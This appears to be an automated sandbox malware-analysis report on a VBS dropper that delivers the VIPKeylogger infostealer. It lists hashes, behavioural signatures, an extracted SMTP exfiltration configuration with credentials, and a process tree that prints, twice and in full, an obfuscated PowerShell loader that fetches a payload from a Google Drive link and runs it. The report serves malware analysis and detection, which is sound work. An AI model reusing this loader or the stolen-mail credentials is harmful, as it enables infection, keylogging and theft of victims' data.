Analysis
-
max time kernel
95s -
max time network
100s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
23-10-2024 14:46
Static task
static1
Behavioral task
behavioral1
Sample
69-33-600 Kreiselkammer ER3.vbs
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
69-33-600 Kreiselkammer ER3.vbs
Resource
win10v2004-20241007-en
General
-
Target
69-33-600 Kreiselkammer ER3.vbs
-
Size
530KB
-
MD5
d281f65b5323332d8061568ce377ea0b
-
SHA1
67230ca5abe0f13217a34801be32ff2d573692fa
-
SHA256
31c400430c28c2ca29976d862878eeb2c365ae4f4afc450eaa6459364cac143a
-
SHA512
6a163cb0202bec65ff0d66df700e93ac6c051469a9c5e4d1e68b2be1e7886f70f69a290e8c2b5e39c1d362d2783942c81561685465149cf6ab75c9d606ee2d16
-
SSDEEP
6144:or/7TXNXM0vl4byj8e8j9317d6AMGsP8lLJIRChb6peTUy6TcWFhyuNgtjzfzycT:iSmlcIyYA/sEJQcb0ctuNOLycdeg
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
mail.minhlamcons.com - Port:
587 - Username:
[email protected] - Password:
@Tran@123456 - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Blocklisted process makes network request 10 IoCs
Processes:
powershell.exemsiexec.exeflow pid process 3 644 powershell.exe 5 644 powershell.exe 8 2764 msiexec.exe 10 2764 msiexec.exe 12 2764 msiexec.exe 14 2764 msiexec.exe 15 2764 msiexec.exe 17 2764 msiexec.exe 19 2764 msiexec.exe 21 2764 msiexec.exe -
Processes:
powershell.exepowershell.exepid process 644 powershell.exe 2068 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
msiexec.exepid process 2764 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exemsiexec.exepid process 2068 powershell.exe 2764 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exemsiexec.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exemsiexec.exepid process 644 powershell.exe 2068 powershell.exe 2068 powershell.exe 2764 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2068 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exemsiexec.exedescription pid process Token: SeDebugPrivilege 644 powershell.exe Token: SeDebugPrivilege 2068 powershell.exe Token: SeDebugPrivilege 2764 msiexec.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 2344 wrote to memory of 644 2344 WScript.exe powershell.exe PID 2344 wrote to memory of 644 2344 WScript.exe powershell.exe PID 2344 wrote to memory of 644 2344 WScript.exe powershell.exe PID 2068 wrote to memory of 2764 2068 powershell.exe msiexec.exe PID 2068 wrote to memory of 2764 2068 powershell.exe msiexec.exe PID 2068 wrote to memory of 2764 2068 powershell.exe msiexec.exe PID 2068 wrote to memory of 2764 2068 powershell.exe msiexec.exe PID 2068 wrote to memory of 2764 2068 powershell.exe msiexec.exe PID 2068 wrote to memory of 2764 2068 powershell.exe msiexec.exe PID 2068 wrote to memory of 2764 2068 powershell.exe msiexec.exe PID 2068 wrote to memory of 2764 2068 powershell.exe msiexec.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\69-33-600 Kreiselkammer ER3.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svmmehud Undertitlerne Preambulation styledom Psorospermial Stemmesamlernes Tchervonets #>;$Stjlendes='Sellouts';<#Lawrencite Unapprehensiveness Fiskeretter shaughn spunsen Kapsejse #>;$Soilless=$Climatometer+$host.UI; function Forhandlingsresultat($Minyae){If ($Soilless) {$Aendrings++;}$Underminister=$Syttenaariges+$Minyae.'Length'-$Aendrings; for( $outdrag=5;$outdrag -lt $Underminister;$outdrag+=6){$Slidte=$outdrag;$Isklumper+=$Minyae[$outdrag];$Tvangsfodrendes='Scandalmonging';}$Isklumper;}function Restrainedness($Skyggeregeringers){ & ($Conacaste) ($Skyggeregeringers);}$Befattedes=Forhandlingsresultat 'ShoweMNonsloacidizBastai SeislOpskrl S,buaAgill/Udra. ';$Befattedes+=Forhandlingsresultat 'Ou sm5Cicad.Misfi0Parth .ngra(LyingWunsaliinsatnLa,godFasteoPimp wBrandsSamme Astr.NSplinTOverb Raa a1Pavel0Hjti .Symas0Eskad;Sogne CollW inquiDefinnWh.gg6Raasy4coffi;Skrd. Overx Comm6 Chap4Cho e;Perso strarChattvAblat:Indv 1Nor a3G thr1Flaad.Pickl0,redi)Nybo. MahuaGErgoteVoldgcWith.kViol oTredi/elekt2St bb0fyrst1Deta 0 Byst0For r1 Ba t0Ignic1 Mega Tet FPhiloi udgerFyldiebagepf Haaro Pac,xSonne/Prude1Udrig3Bestt1Anisa.Servi0Sjlek ';$Manutagi=Forhandlingsresultat ' SynsU earlS f rhE areoRsaldo-SedatASkaf,GStemnEPengen.ncontDrypn ';$Abonneringens=Forhandlingsresultat ' Troph K altDeclit.eminpV gtmsIndaa:Qu tt/Chi v/OpskrdSyriorirefaiPhysivin,oneBetn . AandgImmesoSvrdlo SogngSterslMiljteHoved. kldecVaneloUnculmSv rp/ KlasuRa llcStill?KlatteStranxYav,lp Luddo Of erfrowat,jerg=I teldCrusho Bel,wN,vinnAeterlJyll oNonteaTugthdStang&Cyn pi D.ugdOxh a=,lerf1RafteTFaldeAViz r1EdgarG LovlpMidchPImp,tnAcerotAar ii ReacmFile J dealrPark _ ApokvDa arhUrovaKSuperONo.suzBetal8HemopWYuckip Untrm khoj1 ,atevP.macCCo.sepBrasnPInterCIndpiZStyr.8Priap2 B,anQ Sove ';$Forkromningens=Forhandlingsresultat 'Overp>Tribu ';$Conacaste=Forhandlingsresultat 'Sublai hivaeButtexUntri ';$Staatrolds='Trafikministers';$outdragntermural='\Bromley228.Alb';Restrainedness (Forhandlingsresultat '.onfo$DowncgS mlelHovedOTre eBCampaA FjerLpjatt:BowlfAUnva MPerfob halvaFrancsOve,sSHugorAVultudSulphEPreheFFjll UCalipN SmelK ountt Urini PlumoDurumNFejlmRDr psE TrumR ammo= curr$ S ude Se,vN den.Vudrin: DomkaPriorPSamlePR tjrdDoursaOxr it,ndelADuble+Pr co$Com rO Du,bU PaakT FratDP oprR FlanaMalp gInducnOve.ptMiljoEProacRscareM Bambu VlliR NasuA elevLMatti ');Restrainedness (Forhandlingsresultat 'Daarl$Entr.g SorglSlaviOPreloB SpanaViktuLDataa:No eaLAugmeUBerlimSub,apWu.gie HydrNMultih h,ere R.koDM sku= Ta m$OmproabergaBDisadO Kontnb gniN EverESuppoRGeneriViriaNFarvegSjle e SympnIndigS Pte . Fil.SAcci,POr,reLGenstI seistThrop(Respe$MemorFSpherOFrillR A.gdkscam.r .unsoBarram ptimnSucciIAflejnHepargProgeEKebbynDobbesF uit)Medde ');Restrainedness (Forhandlingsresultat ' Ener[Amm nNMagn eM nertHep o.Akto S Overe Bailrrnt eVval ti G,odC PhthE QuinPPseudO SporiLuftanRacebTAnkomMKydmiaFrostNFredsaBare,GPas hesauteR Curr] Rejf:Jackw:DogiesDe unE ForncCircuUTurnbrTeh,rIHarveTBubsrY HephPAp idRTambao odelt pladO Per cTvivlORekomLMarks ,ingd=Atoms Galac[ ErhvNMaoriE .eksTChart.TchtrS Moute Ailwc kovuYds,lrsus eISinatt AfkayS ambPNon rrRefleoBeardTHardwOKaffecDreadOPin aLA ardtDbefoYIslanpPra seInter]Trini:Genop: rkltS verl hovesSigt 1 Kodf2Udbi. ');$Abonneringens=$Lumpenhed[0];$Teaseler=(Forhandlingsresultat 'Parti$Ch maGUd alL indrOLjer B Supea Dor L Heb,:AccussKu tuK Vi iuSanktmRaastRCensoISolf.NSkeergKardaeunde R Scar2Simil1Swaye9tawnr=WightnKethvETekyaW,mbiv-RanklOTrioeB eccejBifo,E.unktc fpatTjeof K nves.romiy R.ucSPrecotSulphe,otioMFlles.Ddsdrn rom E goosTAuti .,tadiwBumpteFal ub A tocUrenlLS umkI Bople ndbrnChokeTO,trv ');Restrainedness ($Teaseler);Restrainedness (Forhandlingsresultat 'F dse$NoncoSOff,nkFjortu.elexmMalapr Co liSk manR,dfogFore eDi,tar Carn2Ventr1 Vice9Ge,ne.Om efHFortreLaaneaTyvted Ha dedipyrrpyrogsponto[Myr,n$ SnvrMPr jeaHcfganNarreupetunt Vacca yphlg HaaniKombi]S nke=Zeb r$Snud BMontreEfterf FromaGldeltInduktFormueRu kadApproeS,llys Nwaf ');$Coolths=Forhandlingsresultat ' Unsu$Gab,oSElfenkRus.au LizamHermarStetiiAgglunSycongunic e Mis r Rn g2 T.od1 M rr9Dandi. snekD aigroE.terwCivilnCirc lCanvaoAfraka TilsdCapesFPi.eli Betrl Ou geLacti(Tredo$ SemiA Min bUn.haodireknFilsynJeopaeFrifir SvoviNordsnE velgFuggyeNebulnhaughsSo,ri,Pendu$LarisE udp xColosaBanglc HjfotCartoiEsseln AtekgBarocnSnegleGua as Skr.sIrrea)Miaou ';$Exactingness=$Ambassadefunktionrer;Restrainedness (Forhandlingsresultat 'Pligh$KompaGMar il KnolO Omgib Midea,ooktlStyrk: lluESomitn elvsTTolleo LiggZItal.o,bseqORacemLSolopOI adoGGasmoYVide =Progn(P epatBl phEAeratS EuryTBaske-L mpfP.ninsaProfatCistuhOpist omm$Seriee AftexAde.saSa,meC anket ElekiTableN IncagDida,NBradyERenses.isses Poly)Th.or ');while (!$Entozoology) {Restrainedness (Forhandlingsresultat 'trich$ pr,ggSuslilAnraaoSkgg,bBastsaSambel Mis : ircuBF.ugalInexod orykPressoTetragErhvetAskileBri t=Torpe$ Ma rtkorporMidw,uHepateS ege ') ;Restrainedness $Coolths;Restrainedness (Forhandlingsresultat 'LivsvsPrecrtPseudABaandrPri utGranu-Phospsselsklt lske harpETube PHar w veld 4 Blan ');Restrainedness (Forhandlingsresultat 'Progr$SplingS anglCo ruo.resubHaugjaNrbillFrels:PentaeEllarn T,opT KirkoDet.lZRot loMiljsofrot,LMalacOSkuldgTrojkyLaven=Erupt(DokstTG.assEUntraSFarveT Oluf-M grap DansA EskaTTenchhUn xt Gun.r$UdskieHand XGstepA P noCPreseTBallvIGlan.nUnwr,GSqu bNSquibeUbetis UdsaS Soci)Gtevi ') ;Restrainedness (Forhandlingsresultat 'Nabol$ScrotgCherrLNonduOG.lebBCoaxbaCytopl Aulo: DesiAdiffeLPrepitScienI bskuNnonusG La,yS nsufm ispe UncoDSk msL TropEave iM A,demGustaeSubtaTbal a=Aflaa$HjemmGZ.oniLKommaOAxmi BGlasfAVs erlFljls:TunedhMye iJAmortoSituarfuldftMeno eDecisTKkkenAEkstrkCre,ckPostveFurroR PettnChu kEtru l+F rar+Ditta%Tvind$muligL OverUBillemneuroPUncaueBarslNSymbiHHollaeSpecidNeger.SubdaCMete.Ons koUAbidin olfrTClock ') ;$Abonneringens=$Lumpenhed[$Altingsmedlemmet];}$Finansforbundet71=329570;$Fordunklet=31115;Restrainedness (Forhandlingsresultat 'Smaa $ o eggSkibilIn tiOUn erBFossiaB rbalSyste: CrainF mesOL,mstNFootlmAdvisE Oar NApostI CornABiblil So.el roncYHeter .edb=Exord S oleGEn soEMo teTAnalo- SkarcTransokalveNDenoutThusnEFrdigNForb tDlgsm ellu$E,aste An.sxKommaAMyte,CDiftoTRestriSpannnUpborGBegrenP polEU godsJoedesStorm ');Restrainedness (Forhandlingsresultat 'Talef$KorpugC,menl DissoFrikab anelaUsneal .eos:TrikiFMinefiA tilnCamb.tHomocfCircooProlorVivarmCopereMu,ketPr,gr Incon=Aaben Whor[A pinSDatabyF ltlsStaunt B oee.kattmFrows.UrlbrC utchoPlayenW rkevK jseeShmucr slastAppli]Sna.s: R.de:UforeFP neurAarsiosloppm fsvaBKnifeaS olasBrasieSta s6sla.k4 IneaSSkakbtFag er Rhi iP.ymonS natgA esl( Ethn$UgeblNScripoHymennsp akmTidyleObs.rnMisr.i.dygta FyrslAntial reaty Lysl)Gadeu ');Restrainedness (Forhandlingsresultat ' Fer $MisgagFort lCoboloDamspBYesseaDvuarLNonco:Erf,rV reagiUnikarFestiGQu,niU Ove,lHoveraBleezr LethIStra AScopo Miswe=Past Knibt[ TankS eriwy Unf.s ushoTSpiree U remPrese.Decc TCospoeRejseXanfrsTG.lle.RivedEBlameNCalaicSi.naO RequDSlotsIA umiNPerifgremed] usar:Hjemm:CrockAVandssPhrygc.croui erreiDis,o.DecimgSummeEAirspTIntonsUnitat De prSpiraiEvapoNRetteg Ext.(Udlov$SorbifdieseI H,aen E clt Un,rFLynn.O naemRLiturmUnacteKvintt.msme)Hl.ft ');Restrainedness (Forhandlingsresultat 'Megal$AdvergInd.rl TranO AddrbMerobA SupeL B gl:EuropkNonacAFedenrCospoDKonstiGasopNFluktaGaugel Fri iOveret Hibee BefrtAkti EAmbilnCivilsBioa =Leget$opkrvvMatteIslageRBicalg SpicUParabLEnkelaInterRE,veriMonopAM,lta.AarsvSFyrafuAktorBTenenS Ka.ktTykmlrTiltaI HjlpnOpslig Unav(Boord$FamilF FibrIGennenDo gtAStereNVas,tS hackfStuepoOrdnur Pr vb SympU restNDistrd icate Invetindkr7 Prer1Hoped,Overs$NukleFKommuOGravhrNsugrdSkyldu ivsfNFritaKUnderLAst oE Phart Tegn) ouc ');Restrainedness $Kardinalitetens;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:644
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Svmmehud Undertitlerne Preambulation styledom Psorospermial Stemmesamlernes Tchervonets #>;$Stjlendes='Sellouts';<#Lawrencite Unapprehensiveness Fiskeretter shaughn spunsen Kapsejse #>;$Soilless=$Climatometer+$host.UI; function Forhandlingsresultat($Minyae){If ($Soilless) {$Aendrings++;}$Underminister=$Syttenaariges+$Minyae.'Length'-$Aendrings; for( $outdrag=5;$outdrag -lt $Underminister;$outdrag+=6){$Slidte=$outdrag;$Isklumper+=$Minyae[$outdrag];$Tvangsfodrendes='Scandalmonging';}$Isklumper;}function Restrainedness($Skyggeregeringers){ & ($Conacaste) ($Skyggeregeringers);}$Befattedes=Forhandlingsresultat 'ShoweMNonsloacidizBastai SeislOpskrl S,buaAgill/Udra. ';$Befattedes+=Forhandlingsresultat 'Ou sm5Cicad.Misfi0Parth .ngra(LyingWunsaliinsatnLa,godFasteoPimp wBrandsSamme Astr.NSplinTOverb Raa a1Pavel0Hjti .Symas0Eskad;Sogne CollW inquiDefinnWh.gg6Raasy4coffi;Skrd. Overx Comm6 Chap4Cho e;Perso strarChattvAblat:Indv 1Nor a3G thr1Flaad.Pickl0,redi)Nybo. MahuaGErgoteVoldgcWith.kViol oTredi/elekt2St bb0fyrst1Deta 0 Byst0For r1 Ba t0Ignic1 Mega Tet FPhiloi udgerFyldiebagepf Haaro Pac,xSonne/Prude1Udrig3Bestt1Anisa.Servi0Sjlek ';$Manutagi=Forhandlingsresultat ' SynsU earlS f rhE areoRsaldo-SedatASkaf,GStemnEPengen.ncontDrypn ';$Abonneringens=Forhandlingsresultat ' Troph K altDeclit.eminpV gtmsIndaa:Qu tt/Chi v/OpskrdSyriorirefaiPhysivin,oneBetn . AandgImmesoSvrdlo SogngSterslMiljteHoved. kldecVaneloUnculmSv rp/ KlasuRa llcStill?KlatteStranxYav,lp Luddo Of erfrowat,jerg=I teldCrusho Bel,wN,vinnAeterlJyll oNonteaTugthdStang&Cyn pi D.ugdOxh a=,lerf1RafteTFaldeAViz r1EdgarG LovlpMidchPImp,tnAcerotAar ii ReacmFile J dealrPark _ ApokvDa arhUrovaKSuperONo.suzBetal8HemopWYuckip Untrm khoj1 ,atevP.macCCo.sepBrasnPInterCIndpiZStyr.8Priap2 B,anQ Sove ';$Forkromningens=Forhandlingsresultat 'Overp>Tribu ';$Conacaste=Forhandlingsresultat 'Sublai hivaeButtexUntri ';$Staatrolds='Trafikministers';$outdragntermural='\Bromley228.Alb';Restrainedness (Forhandlingsresultat '.onfo$DowncgS mlelHovedOTre eBCampaA FjerLpjatt:BowlfAUnva MPerfob halvaFrancsOve,sSHugorAVultudSulphEPreheFFjll UCalipN SmelK ountt Urini PlumoDurumNFejlmRDr psE TrumR ammo= curr$ S ude Se,vN den.Vudrin: DomkaPriorPSamlePR tjrdDoursaOxr it,ndelADuble+Pr co$Com rO Du,bU PaakT FratDP oprR FlanaMalp gInducnOve.ptMiljoEProacRscareM Bambu VlliR NasuA elevLMatti ');Restrainedness (Forhandlingsresultat 'Daarl$Entr.g SorglSlaviOPreloB SpanaViktuLDataa:No eaLAugmeUBerlimSub,apWu.gie HydrNMultih h,ere R.koDM sku= Ta m$OmproabergaBDisadO Kontnb gniN EverESuppoRGeneriViriaNFarvegSjle e SympnIndigS Pte . Fil.SAcci,POr,reLGenstI seistThrop(Respe$MemorFSpherOFrillR A.gdkscam.r .unsoBarram ptimnSucciIAflejnHepargProgeEKebbynDobbesF uit)Medde ');Restrainedness (Forhandlingsresultat ' Ener[Amm nNMagn eM nertHep o.Akto S Overe Bailrrnt eVval ti G,odC PhthE QuinPPseudO SporiLuftanRacebTAnkomMKydmiaFrostNFredsaBare,GPas hesauteR Curr] Rejf:Jackw:DogiesDe unE ForncCircuUTurnbrTeh,rIHarveTBubsrY HephPAp idRTambao odelt pladO Per cTvivlORekomLMarks ,ingd=Atoms Galac[ ErhvNMaoriE .eksTChart.TchtrS Moute Ailwc kovuYds,lrsus eISinatt AfkayS ambPNon rrRefleoBeardTHardwOKaffecDreadOPin aLA ardtDbefoYIslanpPra seInter]Trini:Genop: rkltS verl hovesSigt 1 Kodf2Udbi. ');$Abonneringens=$Lumpenhed[0];$Teaseler=(Forhandlingsresultat 'Parti$Ch maGUd alL indrOLjer B Supea Dor L Heb,:AccussKu tuK Vi iuSanktmRaastRCensoISolf.NSkeergKardaeunde R Scar2Simil1Swaye9tawnr=WightnKethvETekyaW,mbiv-RanklOTrioeB eccejBifo,E.unktc fpatTjeof K nves.romiy R.ucSPrecotSulphe,otioMFlles.Ddsdrn rom E goosTAuti .,tadiwBumpteFal ub A tocUrenlLS umkI Bople ndbrnChokeTO,trv ');Restrainedness ($Teaseler);Restrainedness (Forhandlingsresultat 'F dse$NoncoSOff,nkFjortu.elexmMalapr Co liSk manR,dfogFore eDi,tar Carn2Ventr1 Vice9Ge,ne.Om efHFortreLaaneaTyvted Ha dedipyrrpyrogsponto[Myr,n$ SnvrMPr jeaHcfganNarreupetunt Vacca yphlg HaaniKombi]S nke=Zeb r$Snud BMontreEfterf FromaGldeltInduktFormueRu kadApproeS,llys Nwaf ');$Coolths=Forhandlingsresultat ' Unsu$Gab,oSElfenkRus.au LizamHermarStetiiAgglunSycongunic e Mis r Rn g2 T.od1 M rr9Dandi. snekD aigroE.terwCivilnCirc lCanvaoAfraka TilsdCapesFPi.eli Betrl Ou geLacti(Tredo$ SemiA Min bUn.haodireknFilsynJeopaeFrifir SvoviNordsnE velgFuggyeNebulnhaughsSo,ri,Pendu$LarisE udp xColosaBanglc HjfotCartoiEsseln AtekgBarocnSnegleGua as Skr.sIrrea)Miaou ';$Exactingness=$Ambassadefunktionrer;Restrainedness (Forhandlingsresultat 'Pligh$KompaGMar il KnolO Omgib Midea,ooktlStyrk: lluESomitn elvsTTolleo LiggZItal.o,bseqORacemLSolopOI adoGGasmoYVide =Progn(P epatBl phEAeratS EuryTBaske-L mpfP.ninsaProfatCistuhOpist omm$Seriee AftexAde.saSa,meC anket ElekiTableN IncagDida,NBradyERenses.isses Poly)Th.or ');while (!$Entozoology) {Restrainedness (Forhandlingsresultat 'trich$ pr,ggSuslilAnraaoSkgg,bBastsaSambel Mis : ircuBF.ugalInexod orykPressoTetragErhvetAskileBri t=Torpe$ Ma rtkorporMidw,uHepateS ege ') ;Restrainedness $Coolths;Restrainedness (Forhandlingsresultat 'LivsvsPrecrtPseudABaandrPri utGranu-Phospsselsklt lske harpETube PHar w veld 4 Blan ');Restrainedness (Forhandlingsresultat 'Progr$SplingS anglCo ruo.resubHaugjaNrbillFrels:PentaeEllarn T,opT KirkoDet.lZRot loMiljsofrot,LMalacOSkuldgTrojkyLaven=Erupt(DokstTG.assEUntraSFarveT Oluf-M grap DansA EskaTTenchhUn xt Gun.r$UdskieHand XGstepA P noCPreseTBallvIGlan.nUnwr,GSqu bNSquibeUbetis UdsaS Soci)Gtevi ') ;Restrainedness (Forhandlingsresultat 'Nabol$ScrotgCherrLNonduOG.lebBCoaxbaCytopl Aulo: DesiAdiffeLPrepitScienI bskuNnonusG La,yS nsufm ispe UncoDSk msL TropEave iM A,demGustaeSubtaTbal a=Aflaa$HjemmGZ.oniLKommaOAxmi BGlasfAVs erlFljls:TunedhMye iJAmortoSituarfuldftMeno eDecisTKkkenAEkstrkCre,ckPostveFurroR PettnChu kEtru l+F rar+Ditta%Tvind$muligL OverUBillemneuroPUncaueBarslNSymbiHHollaeSpecidNeger.SubdaCMete.Ons koUAbidin olfrTClock ') ;$Abonneringens=$Lumpenhed[$Altingsmedlemmet];}$Finansforbundet71=329570;$Fordunklet=31115;Restrainedness (Forhandlingsresultat 'Smaa $ o eggSkibilIn tiOUn erBFossiaB rbalSyste: CrainF mesOL,mstNFootlmAdvisE Oar NApostI CornABiblil So.el roncYHeter .edb=Exord S oleGEn soEMo teTAnalo- SkarcTransokalveNDenoutThusnEFrdigNForb tDlgsm ellu$E,aste An.sxKommaAMyte,CDiftoTRestriSpannnUpborGBegrenP polEU godsJoedesStorm ');Restrainedness (Forhandlingsresultat 'Talef$KorpugC,menl DissoFrikab anelaUsneal .eos:TrikiFMinefiA tilnCamb.tHomocfCircooProlorVivarmCopereMu,ketPr,gr Incon=Aaben Whor[A pinSDatabyF ltlsStaunt B oee.kattmFrows.UrlbrC utchoPlayenW rkevK jseeShmucr slastAppli]Sna.s: R.de:UforeFP neurAarsiosloppm fsvaBKnifeaS olasBrasieSta s6sla.k4 IneaSSkakbtFag er Rhi iP.ymonS natgA esl( Ethn$UgeblNScripoHymennsp akmTidyleObs.rnMisr.i.dygta FyrslAntial reaty Lysl)Gadeu ');Restrainedness (Forhandlingsresultat ' Fer $MisgagFort lCoboloDamspBYesseaDvuarLNonco:Erf,rV reagiUnikarFestiGQu,niU Ove,lHoveraBleezr LethIStra AScopo Miswe=Past Knibt[ TankS eriwy Unf.s ushoTSpiree U remPrese.Decc TCospoeRejseXanfrsTG.lle.RivedEBlameNCalaicSi.naO RequDSlotsIA umiNPerifgremed] usar:Hjemm:CrockAVandssPhrygc.croui erreiDis,o.DecimgSummeEAirspTIntonsUnitat De prSpiraiEvapoNRetteg Ext.(Udlov$SorbifdieseI H,aen E clt Un,rFLynn.O naemRLiturmUnacteKvintt.msme)Hl.ft ');Restrainedness (Forhandlingsresultat 'Megal$AdvergInd.rl TranO AddrbMerobA SupeL B gl:EuropkNonacAFedenrCospoDKonstiGasopNFluktaGaugel Fri iOveret Hibee BefrtAkti EAmbilnCivilsBioa =Leget$opkrvvMatteIslageRBicalg SpicUParabLEnkelaInterRE,veriMonopAM,lta.AarsvSFyrafuAktorBTenenS Ka.ktTykmlrTiltaI HjlpnOpslig Unav(Boord$FamilF FibrIGennenDo gtAStereNVas,tS hackfStuepoOrdnur Pr vb SympU restNDistrd icate Invetindkr7 Prer1Hoped,Overs$NukleFKommuOGravhrNsugrdSkyldu ivsfNFritaKUnderLAst oE Phart Tegn) ouc ');Restrainedness $Kardinalitetens;"1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
469KB
MD5598347a0bcbbbba59adef833a5b27d72
SHA1149039d2fea4a3a940884c9eb8689d59a957a4a2
SHA256ed6dd1b56c22e70a8f7ed2582803ce7731ab5d3210a065d26d34e2ac78e5ef6b
SHA512ae6d040c03aef912f53a29596d25be5832d7faa42ba41b64c287a633f483dd09f26818687fcc5155b1873433a1482cd53357b5b414e6dc4652ae600c3739b236
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L5L3OL3Y3TN603874OXJ.temp
Filesize7KB
MD586c38ce4cd9374f6bc9de3b7f0afb755
SHA1b1ba19185fdb868b72f338ad9404c3ce653abcac
SHA256a40242bde4e13db4dac67d4c0c6154fad454b0e36a350d6350914ba15fb9559d
SHA51208b3471056b545065bfcd5960dcad23919dfe85eac51345ee176d89093474032d85813c8ba4764fc5f7bcb27f84acf9e2fa4efda7c3e9945da168077b05c5a7a